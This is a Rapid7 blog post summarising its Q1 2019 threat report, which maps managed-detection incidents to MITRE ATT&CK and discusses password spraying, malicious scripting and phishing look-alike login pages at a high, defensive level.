Rapid7 recently released the Q1 edition of our Quarterly Threat Report, which is fueled by findings from our managed detection and response service team, incident response service engagements, and internet-scale projects Sonar and Heisenberg. Each quarter, we aim to offer a broad perspective of the threat landscape, then hone in on threats specific to your industry or organization size. You can see all of our previous reports here.
What’s unique about this quarter’s report is that all investigated incidents have been mapped back to the MITRE ATT&CK™ framework. The ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework offers a blueprint of confirmed steps and procedures that attackers use to penetrate internal networks. It’s a helpful way for blue teams and SOCs to evaluate their own defenses; to learn more, check out our three-minute Whiteboard Wednesday on MITRE ATT&CK:
This table from the report maps our Q1 volume of Rapid7 Managed Detection and Response (MDR) incidents (detected by our cloud SIEM, InsightIDR) to the MITRE ATT&CK framework.
Note: “Exfiltration” as a column is omitted, as there were no technique detections for that phase.
Since 90% of the alerts generated by InsightIDR happened at or before the Credential Access phase, this poset will focus on those critical early phases of the attack chain that prelude data theft and breach.
Three familiar categories of adversarial tactics stand out:
- External remote services
- User interface spoofing
Remote entry—which includes multiple country authentications, authentications to critical assets from new sources, or attempted ingress from disabled accounts—has been a fixture atop the threat list in most of our quarterly reports. An unfortunate amount of credentials are exposed via simply guessing obvious passwords or using known password spray lists. Citrix recently revealed that international cybercriminals had intermittent access to its systems for as much as six months, initiated by overseas password spraying attacks to break in. Make sure you’re monitoring the types of events you care about, whether it’s folks getting on your VPN or logins into your IaaS and PaaS environments.
Attackers are leveraging scripting as the lighter fluid to spark malware delivery, persistence, and evade defenses. Scripts universally help speed up manual tasks and commands; when used maliciously, embedded scripts in phishing attachments, PDFs, and office docs help attackers get to the next stage of the chain. For example, within the notorious DNC breach, hackers leveraged PowerShell scripts as a surreptitious way to introduce malicious code into the system.
User interface spoofing
This is high on the list, especially as phishing remains a top threat. Malicious actors often gain access to organizations by baiting employees to give up credentials. Through the use of look-alike login pages that mimic real sites, attackers can steal credentials and gain an initial foothold on web mail or cloud services, working towards gaining internal network access. Well-crafted phishing attack campaigns are largely credited as the first domino in the WannaCry ransomware attack of 2017, and they continue to inundate organizations of all industries and sizes today. (While awaiting official statement from the city, analysts are speculating that the recent Baltimore ransomware attacks were likely triggered by EternalBlue introduced via phishing campaigns.)
While the prevalence of these tactics is alarming, the good news is that these fundamental techniques are well understood. There are powerful tools at your disposal to combat these threats and stop attackers early in the attack chain. A tested threat detection program, along with education and employee awareness training around passwords and phishing, are critical first steps in defending your organization from these common techniques.
To learn more about the threats our team saw in the wild in Q1 2019, read the full Threat Report.